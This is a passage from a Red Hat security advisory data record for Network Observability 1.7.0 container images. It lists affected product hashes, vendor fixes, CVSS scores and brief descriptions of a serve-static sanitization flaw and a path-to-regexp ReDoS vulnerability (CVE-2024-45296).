\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", 